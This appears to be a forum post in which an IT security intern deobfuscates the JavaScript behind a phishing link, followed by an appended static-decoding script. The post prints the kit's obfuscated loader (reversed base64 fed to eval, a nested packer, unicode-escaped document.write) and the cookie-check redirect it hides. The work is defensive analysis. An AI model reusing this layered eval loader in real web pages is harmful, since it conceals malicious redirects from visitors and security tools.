Recently my company received a widespread phishing e-mail; fortunately nobody clicked the link (which is great!)
Since I'm a student and a current intern working in IT security, I wanted to see what this phishing e-mail contained.
I started by running a cURL command on the link and got another link inside it. Basically the link referenced the second URL and refreshed every 2 seconds.
I used a cURL command on that link and got the following in the header response
(Links and domains removed to prevent infection!)
```http
HTTP/1.1 200 OK
Server: nginx/1.8.1
Date: Sat, 21 May 2016 22:07:32 GMT
Content-Type: text/html
Content-Length: 4713
Connection: keep-alive
X-Powered-By: ARR/2.5(bb4753d98)
Set-Cookie: AFFID=370951; expires=Mon, 20-Jun-2016 22:07:26 GMT; Max-Age=2592000; path=/; domain=.XXXXX.(com)
Set-Cookie: SID=20AAA; expires=Mon, 20-Jun-2016 22:07:26 GMT; Max-Age=2592000; path=/; domain=.xxxxx.(com)
```
Inside that body there was a javascript containing this code.
```javascript
var lOO = '==[removed for protection]';
// plain base64 decoder; the alphabet ends in '=' so padding maps to index 64
function OII(data) {
    var _1O0lOI = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    var o1, o2, o3, h1, h2, h3, h4, bits, i = 0, enc = '';
    do {
        h1 = _1O0lOI.indexOf(data.charAt(i++));
        h2 = _1O0lOI.indexOf(data.charAt(i++));
        h3 = _1O0lOI.indexOf(data.charAt(i++));
        h4 = _1O0lOI.indexOf(data.charAt(i++));
        bits = h1 << 18 | h2 << 12 | h3 << 6 | h4;
        o1 = bits >> 16 & 0xff;
        o2 = bits >> 8 & 0xff;
        o3 = bits & 0xff;
        if (h3 == 64) { enc += String.fromCharCode(o1) }
        else if (h4 == 64) { enc += String.fromCharCode(o1, o2) }
        else { enc += String.fromCharCode(o1, o2, o3) }
    } while (i < data.length);
    return enc;
}
// reverses a string: the payload is stored back to front (note the leading '==' padding)
function _1O0(string) {
    var ret = '';
    for (var i = string.length - 1; i >= 0; i--) { ret += string.charAt(i); }
    return ret;
}
eval(OII(_1O0(lOO)));
```
Since this is a Base64 decode, I ran it in a compiler; instead of using eval() I used console.log() to print the results.
```javascript
// outer layer: "p,a,c,k,e,d" packer; the packed string itself holds two more nested copies of the same packer
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2i(26(p,a,c,k,e,d){e=26(c){25(c35?2a.2e(c+29):c.2d(36))};2b(!\'\'.27(/^/,2a)){28(c--){d[e(c)]=k[c]||e(c)}k=[26(e){25 d[e]}];e=26(){25\'\\w+\'};c=1};28(c--){2b(k[c]){p=p.27(2c 2f(\'\\b\'+e(c)+\'\\b\',\'g\'),k[c])}}25 p}(\'1p(U(p,a,c,k,e,d){e=U(c){W(c1s?1r.1m(c+1g):c.1f(1e))};1h(c--){1i(k[c]){p=p.1k(1j 1o(\\'\\\\b\\'+e(c)+\\'\\\\b\\',\\'g\\'),k[c])}}W p}(\\'M I=\\\\'%H%b%8%a%3%o%4%2%4%C%o%0%h%j%4%0%G%4%g%L%5%s%5%b%8%a%3%o%4%j%J%9%e%n%6%8%4%3%1%6%2%5%a%0%x%8%1%1%d%3%0%b%x%0%6%5%k%7%0%c%l%m%9%z%9%i%s%5%a%2%8%1%1%d%3%0%r%6%5%k%7%0%c%2%h%2%l%6%5%s%3%B%5%4%1%a%f%8%1%1%d%3%0%r%6%5%k%7%0%c%m%2%E%2%4%a%n%0%2%w%2%e%5%7%b%0%v%9%9%i%3%e%2%l%4%C%o%0%1%e%2%6%5%s%3%B%5%4%1%a%f%8%1%1%d%3%0%r%6%5%k%7%0%c%2%h%h%2%j%n%6%c%0%e%3%6%0%c%j%2%D%D%2%F%8%1%1%d%3%0%r%6%5%k%7%0%c%m%9%i%z%2%9%i%i%c%1%8%n%t%0%6%4%f%8%1%1%d%3%0%h%j%4%0%b%4%8%1%1%d%3%0%j%v%9%i%i%8%1%1%d%3%0%r%6%5%k%7%0%c%2%h%2%l%c%1%8%n%t%0%6%4%f%8%1%1%d%3%0%f%3%6%c%0%G%N%e%l%j%4%0%b%4%8%1%1%d%3%0%j%m%2%F%h%2%p%S%m%2%E%2%4%a%n%0%2%w%2%e%5%7%b%0%v%9%i%A%9%i%a%0%4%n%a%6%2%l%8%1%1%d%3%0%r%6%5%k%7%0%c%m%v%9%A%9%3%e%2%l%5%a%0%x%8%1%1%d%3%0%b%x%0%6%5%k%7%0%c%l%m%m%2%z%9%2%2%2%2%q%3%6%c%1%q%f%7%1%8%5%4%3%1%6%f%u%a%0%e%2%h%2%y%u%4%4%o%w%g%g%R%O%K%p%q%0%3%B%u%4%7%1%b%b%f%4%1%o%7%1%s%0%7%C%e%1%a%t%1%4%3%1%6%f%8%1%t%g%n%b%g%5%7%t%d%g%8%7%5%p%b%5%e%e%7%1%q%0%a%p%1%3%7%g%y%v%9%A%2%0%7%b%0%2%z%9%2%2%2%2%q%3%6%c%1%q%f%7%1%8%5%4%3%1%6%f%u%a%0%e%2%h%2%y%u%4%4%o%w%g%g%b%5%s%0%p%4%u%0%p%q%3%7%c%p%5%6%3%t%5%7%b%f%6%0%4%g%y%v%9%A%9%H%g%b%8%a%3%o%4%J\\\\';[removed for protection]|2Z|2M|2N|2O|2L|2K|2H|2I|2J|2P|2Q|2W|2X|30|2Y|2V|2U|2R|2S\'.2h(\'|\'),0,{}))',62,204,'|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||return|function|replace|while||String|if|new|toString|fromCharCode|RegExp|parseInt|split|eval|u0065|u0020|u006f|u006b|u0022|u0072|u002e|u0063|u0061|u0069|u006e|56|62|129|u0074|u000a|_escape|u0066|u0009|u003d|u0073|u002f|u0064|u006c|u0029|u0067|u0028|u0075|u0045|u0034|u0070|u0077|u0076|u002d|u0068|u003b|u003e|u006d|u007b|u005f|u0027|u003a|u0079|u007d|u003f|u0021|u006a|u0078|||u003c|u0062|u0039|var|u0026|write|u0036|document|unescape|u0031|u004f'.split('|')))
```
I ran it on the link and got the following results back
```javascript
var _escape = '%u003c%u0073%u0063%u0072%u0069%u0070%u0074%u0020%u0074%u0079%u0070%u0065%u003d%u0022%u0074%u0065%u0078%u0074%u002f%u006a%u0061%u0076%u0061%u0073%u0063%u0072%u0069%u0070%u0074%u0022%u003e%u000a%u0066%u0075%u006e%u0063%u0074%u0069%u006f%u006e%u0020%u0061%u0072%u0065%u005f%u0063%u006f%u006f%u006b%u0069%u0065%u0073%u005f%u0065%u006e%u0061%u0062%u006c%u0065%u0064%u0028%u0029%u000a%u007b%u000a%u0009%u0076%u0061%u0072%u0020%u0063%u006f%u006f%u006b%u0069%u0065%u0045%u006e%u0061%u0062%u006c%u0065%u0064%u0020%u003d%u0020%u0028%u006e%u0061%u0076%u0069%u0067%u0061%u0074%u006f%u0072%u002e%u0063%u006f%u006f%u006b%u0069%u0065%u0045%u006e%u0061%u0062%[removed for protection]; document.write(unescape(_escape));
```
Next I took the code, replaced document.write with console.log, and got back the following javascript.
```javascript
function are_cookies_enabled() {
    var cookieEnabled = (navigator.cookieEnabled) ? true : false;
    if (typeof navigator.cookieEnabled == "undefined" && !cookieEnabled) {
        document.cookie = "testcookie";
        cookieEnabled = (document.cookie.indexOf("testcookie") != -1) ? true : false;
    }
    return (cookieEnabled);
}
if (are_cookies_enabled()) {
    window.location.href = 'website';
} else {
    window.location.href = 'certain website';
}
```
Seeing these two websites, I used cURL on the first link and got back this header
```http
HTTP/1.1 301 Moved Permanently
Server: nginx/1.8.1
Date: Sat, 21 May 2016 21:42:15 GMT
Content-Type: text/html
Content-Length: 33
Connection: keep-alive
X-Powered-By: ARR/2.5(441192e35)
Location: (link to second website in javascript)
```
The body of this link contained a redirect to the second link. Running cURL on it I got this header response
```http
HTTP/1.1 302 Found
Server: nginx/1.9.9
Date: Sat, 21 May 2016 21:42:38 GMT
Content-Length: 11
Connection: keep-alive
location: (link to header response from first link)
```
The body it contained was a "redirect". Apparently it references the second link with the header cookies seen above, setting the cookie on a path of the domain.
So my question is, did I de-obfuscate the code correctly? Is this malware trying to create a test cookie and redirect to another malicious website?
I just want to understand why it isn't enough to run the javascript right there instead of redirecting all over the place? And what is the purpose of setting the cookie on the domain? Is it a backdoor, botnet, DDoS?
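One way to peel the three layers described above without ever calling eval(), as an added example that is not part of the original post or the kit's own code: it re-implements the reversed-base64 step, the `p,a,c,k,e,d` substitution and the `%uXXXX` unescape as plain string functions and runs them over a sample payload constructed here in the same three layers. It assumes Node.js (for `Buffer`).

```javascript
// Added example, not the kit's code: statically peel reversed base64 -> packer -> %uXXXX.
// Layer 1: the kit stored base64 back to front ("==" padding first) and reversed it.
function decodeReversedBase64(s) {
  return Buffer.from(s.split("").reverse().join(""), "base64").toString("latin1");
}

// Layer 2: "p,a,c,k,e,d" packer. Pull (p, a, c, k) out of the eval(...) call and redo the
// packer's own word-by-word substitution, returning the source instead of eval()ing it.
function unpackPacker(src) {
  const m = /\}\('((?:[^'\\]|\\.)*)',(\d+),(\d+),'((?:[^'\\]|\\.)*)'\.split\('\|'\)/.exec(src);
  if (!m) return null;
  let p = m[1].replace(/\\(['\\])/g, "$1");       // undo the \' and \\ escapes of the literal
  const a = Number(m[2]);
  let c = Number(m[3]);
  const k = m[4].split("|");
  const e = n => (n < a ? "" : e(parseInt(n / a))) +   // same base-62 token function as the packer
                 ((n = n % a) > 35 ? String.fromCharCode(n + 29) : n.toString(36));
  while (c--) if (k[c]) p = p.replace(new RegExp("\\b" + e(c) + "\\b", "g"), k[c]);
  return p;
}

// Layer 3: '%u003c%u0073...' is what unescape() consumes; decode the escapes directly.
function decodeUnicodeEscapes(s) {
  return s.replace(/%u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
          .replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Walk all layers; returns the script the kit would finally have document.write()n.
function peel(stage1) {
  const stage2 = unpackPacker(decodeReversedBase64(stage1));
  const m = stage2 && /_escape\s*=\s*'([^']*)'/.exec(stage2);
  return m ? decodeUnicodeEscapes(m[1]) : null;
}

// Constructed sample (no real payload): the cookie-check redirect wrapped in the same layers.
const FINAL = "if(navigator.cookieEnabled){location.href='site_a'}else{location.href='site_b'}";
const uesc = s => [...s].map(ch => "%u" + ch.charCodeAt(0).toString(16).padStart(4, "0")).join("");
const PACKED = "eval(function(p,a,c,k,e,d){/* packer body */}('0 1=\\'" + uesc(FINAL) +
  "\\';2.3(4(1));',62,5,'var|_escape|document|write|unescape'.split('|'),0,{}))";
const SAMPLE = Buffer.from(PACKED, "latin1").toString("base64").split("").reverse().join("");

console.log(peel(SAMPLE));
```

On the real payload you would paste the `lOO` string in as `SAMPLE`; each intermediate stage can be inspected before the next function is applied, which is where the redirect targets and cookie logic become visible without the browser ever running them.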